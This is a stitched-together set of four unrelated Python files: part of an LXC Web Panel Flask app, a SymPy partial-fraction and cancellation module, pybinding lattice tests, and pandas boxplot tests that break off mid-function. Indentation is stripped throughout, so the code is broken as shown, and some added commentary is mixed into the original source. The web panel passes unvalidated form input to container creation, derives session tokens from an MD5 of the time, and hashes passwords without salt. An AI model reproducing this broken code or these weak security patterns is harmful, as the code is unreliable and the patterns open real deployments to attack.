except lxc.ContainerNotRunning:
flash(u'Container %s not frozen!' % name, 'error')
elif action == 'destroy':
if session['su'] != 'Yes':
return abort(403)
try:
if lxc.destroy(name) == 0:
flash(u'Container %s destroyed successfully!' % name,
'success')
else:
flash(u'Unable to destroy %s!' % name, 'error')
except lxc.ContainerDoesntExists:
flash(u'The Container %s does not exist!' % name, 'error')
elif action == 'reboot' and name == 'host':
if session['su'] != 'Yes':
return abort(403)
msg = '\v*** LXC Web Panel *** \
\nReboot from web panel'
try:
subprocess.check_call('/sbin/shutdown -r now \'%s\'' % msg,
shell=True)
flash(u'System will now restart!', 'success')
except:
flash(u'System error!', 'error')
try:
if request.args['from'] == 'edit':
return redirect('../%s/edit' % name)
else:
return redirect(url_for('home'))
except:
return redirect(url_for('home'))
return render_template('login.html')
@app.route('/action/create-container', methods=['GET', 'POST'])
def create_container():
'''
validates the submitted form and creates a container
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
if request.method == 'POST':
name = request.form['name']
template = request.form['template']
command = request.form['command']
if re.match('^(?!containers$)[a-zA-Z0-9_-]+$', name):
storage_method = request.form['backingstore']
if storage_method == 'default':
try:
if lxc.create(name, template=template,
xargs=command) == 0:
flash(u'Container %s created successfully!' % name,
'success')
else:
flash(u'Failed to create %s!' % name, 'error')
except lxc.ContainerAlreadyExists:
flash(u'The Container %s is already created!' % name,
'error')
except subprocess.CalledProcessError:
flash(u'Error while creating %s!' % name, 'error')
elif storage_method == 'directory':
directory = request.form['dir']
if re.match('^/[a-zA-Z0-9_/-]+$', directory) and \
directory != '':
try:
if lxc.create(name, template=template,
storage='dir --dir %s' % directory,
xargs=command) == 0:
flash(u'Container %s created successfully!'
% name, 'success')
else:
flash(u'Failed to create %s!' % name, 'error')
except lxc.ContainerAlreadyExists:
flash(u'The Container %s is already created!'
% name, 'error')
except subprocess.CalledProcessError:
flash(u'Error while creating %s!' % name, 'error')
elif storage_method == 'zfs':
zfs = request.form['zpoolname']
if re.match('^[a-zA-Z0-9_/-]+$', zfs) and zfs != '':
try:
if lxc.create(name, template=template, storage='zfs --zfsroot %s' % zfs, xargs=command) == 0:
flash(u'Container %s created successfully!' % name, 'success')
else:
flash(u'Failed to create %s!' % name, 'error')
except lxc.ContainerAlreadyExists:
flash(u'The Container %s is already created!' % name, 'error')
except subprocess.CalledProcessError:
flash(u'Error while creating %s!' % name, 'error')
elif storage_method == 'lvm':
lvname = request.form['lvname']
vgname = request.form['vgname']
fstype = request.form['fstype']
fssize = request.form['fssize']
storage_options = 'lvm'
if re.match('^[a-zA-Z0-9_-]+$', lvname) and lvname != '':
storage_options += ' --lvname %s' % lvname
if re.match('^[a-zA-Z0-9_-]+$', vgname) and vgname != '':
storage_options += ' --vgname %s' % vgname
if re.match('^[a-z0-9]+$', fstype) and fstype != '':
storage_options += ' --fstype %s' % fstype
if re.match('^[0-9][G|M]$', fssize) and fssize != '':
storage_options += ' --fssize %s' % fssize
try:
if lxc.create(name, template=template,
storage=storage_options,
xargs=command) == 0:
flash(u'Container %s created successfully!' % name,
'success')
else:
flash(u'Failed to create %s!' % name, 'error')
except lxc.ContainerAlreadyExists:
flash(u'The container/logical volume %s is '
'already created!' % name, 'error')
except subprocess.CalledProcessError:
flash(u'Error while creating %s!' % name, 'error')
else:
flash(u'Missing parameters to create container!', 'error')
else:
if name == '':
flash(u'Please enter a container name!', 'error')
else:
flash(u'Invalid name for \"%s\"!' % name, 'error')
return redirect(url_for('home'))
return render_template('login.html')
@app.route('/action/clone-container', methods=['GET', 'POST'])
def clone_container():
'''
validates the submitted form and clones a container
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
if request.method == 'POST':
orig = request.form['orig']
name = request.form['name']
try:
snapshot = request.form['snapshot']
if snapshot == 'True':
snapshot = True
except KeyError:
snapshot = False
if re.match('^(?!containers$)[a-zA-Z0-9_-]+$', name):
out = None
try:
out = lxc.clone(orig=orig, new=name, snapshot=snapshot)
except lxc.ContainerAlreadyExists:
flash(u'The Container %s already exists!' % name, 'error')
except subprocess.CalledProcessError:
flash(u'Can\'t snapshot a directory', 'error')
if out is not None and out == 0:
flash(u'Container %s cloned into %s successfully!'
% (orig, name), 'success')
elif out is not None and out != 0:
flash(u'Failed to clone %s into %s!' % (orig, name),
'error')
else:
if name == '':
flash(u'Please enter a container name!', 'error')
else:
flash(u'Invalid name for \"%s\"!' % name, 'error')
return redirect(url_for('home'))
return render_template('login.html')
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
request_username = request.form['username']
request_passwd = hash_passwd(request.form['password'])
current_url = request.form['url']
user = query_db('select name, username, su from users where username=? '
'and password=?', [request_username, request_passwd],
one=True)
if user:
session['logged_in'] = True
session['token'] = get_token()
session['last_activity'] = int(time.time())
session['username'] = user['username']
session['name'] = user['name']
session['su'] = user['su']
flash(u'You are logged in!', 'success')
if current_url == url_for('login'):
return redirect(url_for('home'))
return redirect(current_url)
flash(u'Invalid username or password!', 'error')
return render_template('login.html')
@app.route('/logout')
def logout():
session.pop('logged_in', None)
session.pop('token', None)
session.pop('last_activity', None)
session.pop('username', None)
session.pop('name', None)
session.pop('su', None)
flash(u'You are logged out!', 'success')
return redirect(url_for('login'))
@app.route('/_refresh_cpu_host')
def refresh_cpu_host():
if 'logged_in' in session:
return lwp.host_cpu_percent()
@app.route('/_refresh_uptime_host')
def refresh_uptime_host():
if 'logged_in' in session:
return jsonify(lwp.host_uptime())
@app.route('/_refresh_disk_host')
def refresh_disk_host():
if 'logged_in' in session:
return jsonify(lwp.host_disk_usage(partition=config.get('overview',
'partition')))
@app.route('/_refresh_memory_<name>')
def refresh_memory_containers(name=None):
if 'logged_in' in session:
if name == 'containers':
containers_running = lxc.running()
containers = []
for container in containers_running:
container = container.replace(' (auto)', '')
containers.append({'name': container,
'memusg': lwp.memory_usage(container)})
return jsonify(data=containers)
elif name == 'host':
return jsonify(lwp.host_memory_usage())
return jsonify({'memusg': lwp.memory_usage(name)})
@app.route('/_check_version')
def check_version():
if 'logged_in' in session:
return jsonify(lwp.check_version())
def hash_passwd(passwd):
return hashlib.sha512(passwd.encode()).hexdigest()
def get_token():
return hashlib.md5(str(time.time()).encode()).hexdigest()
def query_db(query, args=(), one=False):
cur = g.db.execute(query, args)
rv = [dict((cur.description[idx][0], value)
for idx, value in enumerate(row)) for row in cur.fetchall()]
return (rv[0] if rv else None) if one else rv
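# Illustrative usage of query_db (commentary added; not part of the original
# module). Each row is returned as a dict keyed by column name; a hedged
# sketch with placeholder values:
#   user = query_db('SELECT id, username FROM users WHERE username=?',
#                   ['admin'], one=True)
#   # -> {'id': 1, 'username': 'admin'}, or None if no row matched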
def check_session_limit():
if 'logged_in' in session and session.get('last_activity') is not None:
now = int(time.time())
limit = now - 60 * int(config.get('session', 'time'))
last_activity = session.get('last_activity')
if last_activity < limit:
flash(u'Session timed out !', 'info')
logout()
else:
session['last_activity'] = now
if __name__ == '__main__':
app.run(host=app.config['ADDRESS'], port=app.config['PORT'])
|
|
"""Module 'rewrite.py' contains advanced term rewriting methods concerning
partial fraction decomposition, combining together and collecting terms.
"""
from sympy.core.add import Add
from sympy.core.mul import Mul
from sympy.core.power import Pow
from sympy.core.relational import Relational
from sympy.core.symbol import Symbol, Temporary
from sympy.core.numbers import Integer, Rational
from sympy.core.function import Function, Lambda
from sympy.core.basic import Basic, S, C, Atom, sympify
from sympy.utilities import threaded
from sympy.simplify import together
from sympy.functions import exp
from sympy.polys import Poly, RootSum, div, quo, gcd
from sympy.polys.algorithms import poly_quo, poly_rem, \
poly_sqf, poly_gcd, poly_half_gcdex
@threaded()
def cancel(f, *symbols):
"""Cancel common factors in a given rational function.
Given a quotient of polynomials, performing only gcd and quo
operations in polynomial algebra, return rational function
with numerator and denominator of minimal total degree in
an expanded form.
For all other kinds of expressions the input is returned in
an unchanged form. Note however, that 'cancel' function can
thread over sums and relational operators.
Additionally you can specify a list of variables to perform
cancellation more efficiently using only those symbols.
>>> from sympy import cancel, sqrt
>>> from sympy.abc import x, y
>>> cancel((x**2-1)/(x-1))
1 + x
>>> cancel((x**2-y**2)/(x-y), x)
x + y
>>> cancel((x**2-2)/(x+sqrt(2)))
x - 2**(1/2)
"""
return Poly.cancel(f, *symbols)
def trim(f, *symbols, **flags):
"""Cancel common factors in a given formal rational expression.
Given an arbitrary expression, map all functional components
to temporary symbols, rewriting this expression to rational
function form and perform cancellation of common factors.
When given a rational function or a list of symbols discards
all functional components, then this procedure is equivalent
to cancel().
Note that this procedure can thread over composite objects
like big operators, matrices, relational operators etc. It
can also be called recursively (to change this behavior,
unset the 'recursive' flag).
>>> from sympy import Function, trim, sin
>>> from sympy.abc import x, y
>>> f = Function('f')
>>> trim((f(x)**2+f(x))/f(x))
1 + f(x)
>>> trim((x**2+x)/x)
1 + x
Recursively simplify expressions:
>>> trim(sin((f(x)**2+f(x))/f(x)))
sin(1 + f(x))
"""
f = sympify(f)
if isinstance(f, Relational):
return Relational(trim(f.lhs, *symbols, **flags),
trim(f.rhs, *symbols, **flags), f.rel_op)
#elif isinstance(f, Matrix):
# return f.applyfunc(lambda g: trim(g, *symbols, **flags))
else:
recursive = flags.get('recursive', True)
def is_functional(g):
return not (g.is_Atom or g.is_number) \
and (not symbols or g.has(*symbols))
def components(g):
result = set()
if is_functional(g):
if g.is_Add or g.is_Mul:
args = []
for h in g.args:
h, terms = components(h)
result |= terms
args.append(h)
g = g.func(*args)
elif g.is_Pow:
if recursive:
base = trim(g.base, *symbols, **flags)
else:
base = g.base
if g.exp.is_Rational:
if g.exp.is_Integer:
if g.exp is S.NegativeOne:
h, terms = components(base)
return h**S.NegativeOne, terms
else:
h = base
else:
h = base**Rational(1, g.exp.q)
g = base**g.exp
else:
if recursive:
h = g = base**trim(g.exp, *symbols, **flags)
else:
h = g = base**g.exp
if is_functional(h):
result.add(h)
else:
if not recursive:
result.add(g)
else:
g = g.func(*[trim(h, *symbols, **flags)
for h in g.args])
if is_functional(g):
result.add(g)
return g, result
if not isinstance(f, Basic) \
or f.is_number \
or not f.has_any_symbols(*symbols):
return f
f = together(f.expand())
f, terms = components(f)
if not terms:
return Poly.cancel(f, *symbols)
else:
mapping, reverse = {}, {}
for g in terms:
mapping[g] = Temporary()
reverse[mapping[g]] = g
p, q = f.as_numer_denom()
f = p.expand()/q.expand()
if not symbols:
symbols = tuple(f.atoms(Symbol))
symbols = tuple(mapping.values()) + symbols
H = Poly.cancel(f.subs(mapping), *symbols)
if not flags.get('extract', True):
return H.subs(reverse)
else:
def extract(f):
p = f.args[0]
for q in f.args[1:]:
p = gcd(p, q, *symbols)
if p.is_number:
return S.One, f
return p, Add(*[quo(g, p, *symbols) for g in f.args])
P, Q = H.as_numer_denom()
if P.is_Add:
GP, P = extract(P)
else:
GP = S.One
if Q.is_Add:
GQ, Q = extract(Q)
else:
GQ = S.One
return ((GP*P)/(GQ*Q)).subs(reverse)
@threaded()
def apart(f, z, **flags):
"""Compute partial fraction decomposition of a rational function.
Given a rational function 'f', performing only gcd operations
over the algebraic closure of the initial field of definition,
compute full partial fraction decomposition with fractions
having linear denominators.
For all other kinds of expressions the input is returned in an
unchanged form. Note however, that 'apart' function can thread
over sums and relational operators.
Note that no factorization of the initial denominator of 'f' is
needed. The final decomposition is formed in terms of a sum of
RootSum instances. By default RootSum tries to compute all its
roots to simplify itself. This behavior can, however, be avoided
by setting the keyword flag evaluate=False, which will make this
function return a formal decomposition.
>>> from sympy import apart
>>> from sympy.abc import x, y
>>> apart(y/(x+2)/(x+1), x)
y/(1 + x) - y/(2 + x)
>>> apart(1/(1+x**5), x, evaluate=False)
RootSum(Lambda(_a, -_a/(5*(x - _a))), x**5 + 1, x)
For more information on the implemented algorithm refer to:
[1] M. Bronstein, B. Salvy, Full partial fraction decomposition
of rational functions, in: M. Bronstein, ed., Proceedings
ISSAC '93, ACM Press, Kiev, Ukraine, 1993, pp. 157-160.
"""
if not f.has(z):
return f
f = Poly.cancel(f, z)
P, Q = f.as_numer_denom()
if not Q.has(z):
return f
partial, r = div(P, Q, z)
f, q, U = r / Q, Q, []
u = Function('u')(z)
a = Symbol('a', dummy=True)
for k, d in enumerate(poly_sqf(q, z)):
n, b = k + 1, d.as_basic()
U += [ u.diff(z, k) ]
h = together(Poly.cancel(f*b**n, z) / u**n)
H, subs = [h], []
for j in range(1, n):
H += [ H[-1].diff(z) / j ]
for j in range(1, n+1):
subs += [ (U[j-1], b.diff(z, j) / j) ]
for j in range(0, n):
P, Q = together(H[j]).as_numer_denom()
for i in range(0, j+1):
P = P.subs(*subs[j-i])
Q = Q.subs(*subs[0])
P, Q = Poly(P, z), Poly(Q, z)
G = poly_gcd(P, d)
D = poly_quo(d, G)
B, g = poly_half_gcdex(Q, D)
b = poly_rem(P * poly_quo(B, g), D)
numer = b.as_basic()
denom = (z-a)**(n-j)
expr = numer.subs(z, a) / denom
partial += RootSum(Lambda(a, expr), D, **flags)
return partial
|
|
import pytest
import numpy as np
import pybinding as pb
from pybinding.repository import graphene
from pybinding.support.deprecated import LoudDeprecationWarning
lattices = {
"graphene-monolayer": graphene.monolayer(),
"graphene-monolayer-nn": graphene.monolayer(2),
"graphene-monolayer-4atom": graphene.monolayer_4atom(),
"graphene-bilayer": graphene.bilayer(),
}
@pytest.fixture(scope='module', ids=list(lattices.keys()), params=lattices.values())
def lattice(request):
return request.param
def test_pickle_round_trip(lattice):
import pickle
unpickled = pickle.loads(pickle.dumps(lattice))
assert pytest.fuzzy_equal(lattice, unpickled)
def test_expected(lattice, baseline, plot_if_fails):
expected = baseline(lattice)
plot_if_fails(lattice, expected, "plot")
assert pytest.fuzzy_equal(lattice, expected)
def test_init():
lat1d = pb.Lattice(1)
assert lat1d.ndim == 1
assert len(lat1d.vectors) == 1
assert pytest.fuzzy_equal(lat1d.vectors[0], [1, 0, 0])
lat2d = pb.Lattice([1, 0], [0, 1])
assert lat2d.ndim == 2
assert len(lat2d.vectors) == 2
assert pytest.fuzzy_equal(lat2d.vectors[0], [1, 0, 0])
assert pytest.fuzzy_equal(lat2d.vectors[1], [0, 1, 0])
lat3d = pb.Lattice([1, 0, 0], [0, 1, 0], [0, 0, 1])
assert lat3d.ndim == 3
assert len(lat3d.vectors) == 3
assert pytest.fuzzy_equal(lat3d.vectors[0], [1, 0, 0])
assert pytest.fuzzy_equal(lat3d.vectors[1], [0, 1, 0])
assert pytest.fuzzy_equal(lat3d.vectors[2], [0, 0, 1])
def test_add_sublattice(capsys):
lat = pb.Lattice(1)
assert lat.nsub == 0
lat.add_one_sublattice("A", 0.0)
assert lat.nsub == 1
lat.add_sublattices(("B", 0.1),
("C", 0.2))
assert lat.nsub == 3
subs = lat.sublattices
assert len(subs) == 3
assert all(v in subs for v in ("A", "B", "C"))
assert pytest.fuzzy_equal(subs["A"].position, [0, 0, 0])
assert subs["A"].energy == 0
assert subs["A"].unique_id == 0
assert subs["A"].alias_id == 0
assert pytest.fuzzy_equal(subs["B"].position, [0.1, 0, 0])
assert subs["B"].energy == 0
assert subs["B"].unique_id == 1
assert subs["B"].alias_id == 1
assert pytest.fuzzy_equal(subs["C"].position, [0.2, 0, 0])
assert subs["C"].energy == 0
assert subs["C"].unique_id == 2
assert subs["C"].alias_id == 2
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("", 0)
assert "Sublattice name can't be blank" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("A", 0)
assert "Sublattice 'A' already exists" in str(excinfo.value)
with pytest.warns(LoudDeprecationWarning):
assert lat["A"] == "A"
capsys.readouterr()
def test_add_multiorbital_sublattice():
lat = pb.Lattice([1, 0], [0, 1])
lat.add_one_sublattice("A", [0, 0])
assert lat.nsub == 1
lat.add_one_sublattice("B", [0, 0], [1, 2, 3])
assert pytest.fuzzy_equal(lat.sublattices["B"].energy, [[1, 0, 0],
[0, 2, 0],
[0, 0, 3]])
lat.add_one_sublattice("C", [0, 0], [[1, 2, 3],
[0, 4, 5],
[0, 0, 6]])
assert pytest.fuzzy_equal(lat.sublattices["C"].energy, [[1, 2, 3],
[2, 4, 5],
[3, 5, 6]])
lat.add_one_sublattice("D", [0, 0], [[1, 2j, 3],
[0, 4, 5j],
[0, 0, 6]])
assert pytest.fuzzy_equal(lat.sublattices["D"].energy, [[ 1, 2j, 3],
[-2j, 4, 5j],
[ 3, -5j, 6]])
lat.add_one_sublattice("E", [0, 0], [[1, 2, 3],
[2, 4, 5],
[3, 5, 6]])
assert pytest.fuzzy_equal(lat.sublattices["E"].energy, [[1, 2, 3],
[2, 4, 5],
[3, 5, 6]])
assert lat.nsub == 5
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("zero-dimensional", [0, 0], [])
assert "can't be zero-dimensional" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("complex onsite energy", [0, 0], [1j, 2j, 3j])
assert "must be a real vector or a square matrix" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("not square", [0, 0], [[1, 2, 3],
[4, 5, 6]])
assert "must be a real vector or a square matrix" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("not square", [0, 0], [[1j, 2, 3],
[ 2, 4j, 5],
[ 3, 5, 6j]])
assert "The main diagonal of the onsite hopping term must be real" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_sublattice("not Hermitian", [0, 0], [[1, 2, 3],
[4, 5, 6],
[7, 8, 9]])
assert "The onsite hopping matrix must be upper triangular or Hermitian" in str(excinfo.value)
def test_add_sublattice_alias(capsys):
lat = pb.Lattice([1, 0], [0, 1])
lat.add_sublattices(("A", [0.0, 0.5]),
("B", [0.5, 0.0]))
c_position = [0, 9]
lat.add_one_alias("C", "A", c_position)
assert lat.sublattices["C"].unique_id != lat.sublattices["A"].unique_id
assert lat.sublattices["C"].alias_id == lat.sublattices["A"].alias_id
model = pb.Model(lat)
c_index = model.system.find_nearest(c_position)
assert model.system.sublattices[c_index] == lat.sublattices["C"].alias_id
assert c_index in np.argwhere(model.system.sublattices == "A")
with pytest.raises(IndexError) as excinfo:
lat.add_one_alias("D", "bad_name", [0, 0])
assert "There is no sublattice named 'bad_name'" in str(excinfo.value)
with pytest.warns(LoudDeprecationWarning):
lat.add_one_sublattice("Z", c_position, alias="A")
capsys.readouterr()
def test_add_hopping(capsys):
lat = pb.Lattice([1, 0], [0, 1])
lat.add_sublattices(("A", [0.0, 0.5]),
("B", [0.5, 0.0]))
lat.add_hoppings(([0, 0], "A", "B", 1),
([1, -1], "A", "B", 1),
([0, -1], "A", "B", 2))
assert lat.nhop == 2
assert lat.hoppings["__anonymous__0"].family_id == 0
assert lat.hoppings["__anonymous__0"].energy == 1
assert lat.hoppings["__anonymous__1"].family_id == 1
assert lat.hoppings["__anonymous__1"].energy == 2
lat.add_hoppings(([0, 1], "A", "B", 1))
assert lat.nhop == 2
lat.add_hoppings(([1, 0], "A", "B", 3))
assert lat.nhop == 3
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], "A", "B", 1)
assert "hopping already exists" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], "A", "A", 1)
assert "Don't define onsite energy here" in str(excinfo.value)
with pytest.raises(IndexError) as excinfo:
lat.add_one_hopping([0, 0], "C", "A", 1)
assert "There is no sublattice named 'C'" in str(excinfo.value)
lat.register_hopping_energies({
"t_nn": 0.1,
"t_nnn": 0.01
})
assert lat.nhop == 5
assert lat.hoppings["t_nn"].energy == 0.1
assert lat.hoppings["t_nnn"].energy == 0.01
lat.add_one_hopping([0, 1], "A", "A", "t_nn")
with pytest.raises(RuntimeError) as excinfo:
lat.register_hopping_energies({"": 0.0})
assert "Hopping name can't be blank" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.register_hopping_energies({"t_nn": 0.2})
assert "Hopping 't_nn' already exists" in str(excinfo.value)
with pytest.raises(IndexError) as excinfo:
lat.add_one_hopping((0, 1), "A", "A", "tt")
assert "There is no hopping named 'tt'" in str(excinfo.value)
with pytest.warns(LoudDeprecationWarning):
assert lat("t_nn") == "t_nn"
capsys.readouterr()
def test_add_matrix_hopping():
lat = pb.Lattice([1, 0], [0, 1])
lat.add_sublattices(("A", [0.0, 0.5]),
("B", [0.5, 0.0]))
lat.add_hoppings(([0, 0], "A", "B", 1),
([1, -1], "A", "B", 1),
([0, -1], "A", "B", 2))
assert lat.nsub == 2
assert lat.nhop == 2
lat.add_sublattices(("A2", [0, 0], [1, 2]),
("B2", [0, 0], [1, 2]),
("C3", [0, 0], [1, 2, 3]))
assert lat.nsub == 5
lat.register_hopping_energies({"t22": [[1, 2],
[3, 4]],
"t23": [[1, 2, 3],
[4, 5, 6]]})
assert lat.nhop == 4
with pytest.raises(RuntimeError) as excinfo:
lat.register_hopping_energies({"zero-dimensional": []})
assert "can't be zero-dimensional" in str(excinfo.value)
lat.add_hoppings(([0, 0], "A2", "B2", "t22"),
([1, 0], "A2", "A2", "t22"),
([0, 0], "A2", "C3", "t23"),
([1, 0], "A2", "C3", "t23"))
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], 'A2', 'A2', "t22")
assert "Don't define onsite energy here" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], 'B2', 'C3', "t22")
assert "mismatch: from 'B2' (2) to 'C3' (3) with matrix 't22' (2, 2)" in str(excinfo.value)
with pytest.raises(RuntimeError) as excinfo:
lat.add_one_hopping([0, 0], 'C3', 'B2', "t23")
assert "mismatch: from 'C3' (3) to 'B2' (2) with matrix 't23' (2, 3)" in str(excinfo.value)
def test_builder():
"""Builder pattern methods"""
lattice = pb.Lattice([1, 0], [0, 1])
copy = lattice.with_offset([0, 0.5])
assert pytest.fuzzy_equal(copy.offset, [0, 0.5, 0])
assert pytest.fuzzy_equal(lattice.offset, [0, 0, 0])
copy = lattice.with_min_neighbors(5)
assert copy.min_neighbors == 5
assert lattice.min_neighbors == 1
def test_brillouin_zone():
from math import pi, sqrt
lat = pb.Lattice(a1=1)
assert pytest.fuzzy_equal(lat.brillouin_zone(), [-pi, pi])
lat = pb.Lattice(a1=[0, 1], a2=[0.5, 0.5])
assert pytest.fuzzy_equal(lat.brillouin_zone(),
[[0, -2 * pi], [2 * pi, 0], [0, 2 * pi], [-2 * pi, 0]])
# Identical lattices represented using acute and obtuse angles between primitive vectors
acute = pb.Lattice(a1=[1, 0], a2=[1/2, 1/2 * sqrt(3)])
obtuse = pb.Lattice(a1=[1/2, 1/2 * sqrt(3)], a2=[1/2, -1/2 * sqrt(3)])
assert pytest.fuzzy_equal(acute.brillouin_zone(), obtuse.brillouin_zone())
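# Illustrative sketch (not one of the original test cases): the pieces
# exercised above (add_sublattices, register_hopping_energies, add_hoppings)
# are typically combined like this to build a minimal square lattice with a
# single named hopping. Names and values here are assumptions for the example.
def _example_square_lattice(onsite=0.0, t=1.0):
    lat = pb.Lattice(a1=[1, 0], a2=[0, 1])
    lat.add_sublattices(("A", [0, 0], onsite))
    lat.register_hopping_energies({"t": t})
    # Hoppings to the neighbouring unit cells along a1 and a2.
    lat.add_hoppings(([1, 0], "A", "A", "t"),
                     ([0, 1], "A", "A", "t"))
    return lat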
|
|
""" Test cases for .boxplot method """
import itertools
import string
import numpy as np
import pytest
import pandas.util._test_decorators as td
from pandas import (
DataFrame,
MultiIndex,
Series,
date_range,
timedelta_range,
)
import pandas._testing as tm
from pandas.tests.plotting.common import (
TestPlotBase,
_check_plot_works,
)
import pandas.plotting as plotting
pytestmark = pytest.mark.slow
@td.skip_if_no_mpl
class TestDataFramePlots(TestPlotBase):
def test_boxplot_legacy1(self):
df = DataFrame(
np.random.randn(6, 4),
index=list(string.ascii_letters[:6]),
columns=["one", "two", "three", "four"],
)
df["indic"] = ["foo", "bar"] * 3
df["indic2"] = ["foo", "bar", "foo"] * 2
_check_plot_works(df.boxplot, return_type="dict")
_check_plot_works(df.boxplot, column=["one", "two"], return_type="dict")
# _check_plot_works adds an ax so catch warning. see GH #13188
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, column=["one", "two"], by="indic")
_check_plot_works(df.boxplot, column="one", by=["indic", "indic2"])
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, by="indic")
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, by=["indic", "indic2"])
_check_plot_works(plotting._core.boxplot, data=df["one"], return_type="dict")
_check_plot_works(df.boxplot, notch=1, return_type="dict")
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, by="indic", notch=1)
def test_boxplot_legacy2(self):
df = DataFrame(np.random.rand(10, 2), columns=["Col1", "Col2"])
df["X"] = Series(["A", "A", "A", "A", "A", "B", "B", "B", "B", "B"])
df["Y"] = Series(["A"] * 10)
with tm.assert_produces_warning(UserWarning):
_check_plot_works(df.boxplot, by="X")
# When ax is supplied and the required number of axes is 1, the
# passed ax should be used:
fig, ax = self.plt.subplots()
axes = df.boxplot("Col1", by="X", ax=ax)
ax_axes = ax.axes
assert ax_axes is axes
fig, ax = self.plt.subplots()
axes = df.groupby("Y").boxplot(ax=ax, return_type="axes")
ax_axes = ax.axes
assert ax_axes is axes["A"]
# Multiple columns with an ax argument should use same figure
fig, ax = self.plt.subplots()
with tm.assert_produces_warning(UserWarning):
axes = df.boxplot(
column=["Col1", "Col2"], by="X", ax=ax, return_type="axes"
)
assert axes["Col1"].get_figure() is fig
# When by is None, check that all relevant lines are present in the
# dict
fig, ax = self.plt.subplots()
d = df.boxplot(ax=ax, return_type="dict")
lines = list(itertools.chain.from_iterable(d.values()))
assert len(ax.get_lines()) == len(lines)
def test_boxplot_return_type_none(self):
# GH 12216; return_type=None & by=None -> axes
result = self.hist_df.boxplot()
assert isinstance(result, self.plt.Axes)
def test_boxplot_return_type_legacy(self):
# API change in https://github.com/pandas-dev/pandas/pull/7096
import matplotlib as mpl # noqa
df = DataFrame(
np.random.randn(6, 4),
index=list(string.ascii_letters[:6]),
columns=["one", "two", "three", "four"],
)
msg = "return_type must be {'axes', 'dict', 'both'}"
with pytest.raises(ValueError, match=msg):
df.boxplot(return_type="NOT_A_TYPE")
result = df.boxplot()
self._check_box_return_type(result, "axes")
with tm.assert_produces_warning(False):
result = df.boxplot(return_type="dict")
self._check_box_return_type(result, "dict")
with tm.assert_produces_warning(False):
result = df.boxplot(return_type="axes")
self._check_box_return_type(result, "axes")
with tm.assert_produces_warning(False):
result = df.boxplot(return_type="both")
self._check_box_return_type(result, "both")
def test_boxplot_axis_limits(self):
def _check_ax_limits(col, ax):
y_min, y_max = ax.get_ylim()
assert y_min <= col.min()
assert y_max >= col.max()
df = self.hist_df.copy()
df["age"] = np.random.randint(1, 20, df.shape[0])
# One full row
height_ax, weight_ax = df.boxplot(["height", "weight"], by="category")
_check_ax_limits(df["height"], height_ax)
_check_ax_limits(df["weight"], weight_ax)
assert weight_ax._sharey == height_ax
# Two rows, one partial
p = df.boxplot(["height", "weight", "age"], by="category")
height_ax, weight_ax, age_ax = p[0, 0], p[0, 1], p[1, 0]
dummy_ax = p[1, 1]
_check_ax_limits(df["height"], height_ax)
_check_ax_limits(df["weight"], weight_ax)
_check_ax_limits(df["age"], age_ax)
assert weight_ax._sharey == height_ax
assert age_ax._sharey == height_ax
assert dummy_ax._sharey is None
def test_boxplot_empty_column(self):
df = DataFrame(np.random.randn(20, 4))
df.loc[:, 0] = np.nan
_check_plot_works(df.boxplot, return_type="axes")
def test_figsize(self):
df = DataFrame(np.random.rand(10, 5), columns=["A", "B", "C", "D", "E"])
result = df.boxplot(return_type="axes", figsize=(12, 8))
assert result.figure.bbox_inches.width == 12
assert result.figure.bbox_inches.height == 8
def test_fontsize(self):
df = DataFrame({"a": [1, 2, 3, 4, 5, 6]})
self._check_ticks_props(
df.boxplot("a", fontsize=16), xlabelsize=16, ylabelsize=16
)
def test_boxplot_numeric_data(self):
# GH 22799
df = DataFrame(
{
"a": date_range("2012-01-01", periods=100),
"b": np.random.randn(100),
"c": np.random.randn(100) + 2,
"d": date_range("2012-01-01", periods=100).astype(str),
"e": date_range("2012-01-01", periods=100, tz="UTC"),
"f": timedelta_range("1 days", periods=100),
}
)
ax = df.plot(kind="box")
assert [x.get_text() for x in ax.get_xticklabels()] == ["b", "c"]
@pytest.mark.parametrize(
"colors_kwd, expected",
[
(
{"boxes": "r", "whiskers": "b", "medians": "g", "caps": "c"},
{"boxes": "r", "whiskers": "b", "medians": "g", "caps": "c"},
),
({"boxes": "r"}, {"boxes": "r"}),
("r", {"boxes": "r", "whiskers": "r", "medians": "r", "caps": "r"}),
],
)
def test_color_kwd(self, colors_kwd, expected):
# GH: 26214
df = DataFrame(np.random.rand(10, 2))
result = df.boxplot(color=colors_kwd, return_type="dict")
for k, v in expected.items():
assert result[k][0].get_color() == v
@pytest.mark.parametrize(
"scheme,expected",
[
(
"dark_background",
{
"boxes": "#8dd3c7",
"whiskers": "#8dd3c7",
"medians": "#bfbbd9",
"caps": "#8dd3c7",
},
),
(
"default",
{
"boxes": "#1f77b4",
"whiskers": "#1f77b4",
"medians": "#2ca02c",
"caps": "#1f77b4",
},
),
],
)
def test_colors_in_theme(self, scheme, expected):
# GH: 40769
df = DataFrame(np.random.rand(10, 2))
import matplotlib.pyplot as plt
plt.style.use(scheme)
result = df.plot.box(return_type="dict")
for k, v in expected.items():
assert result[k][0].get_color() == v
@pytest.mark.parametrize(
"dict_colors, msg",
[({"boxes": "r", "invalid_key": "r"}, "invalid key 'invalid_key'")],
)
def test_color_kwd_errors(self, dict_colors, msg):
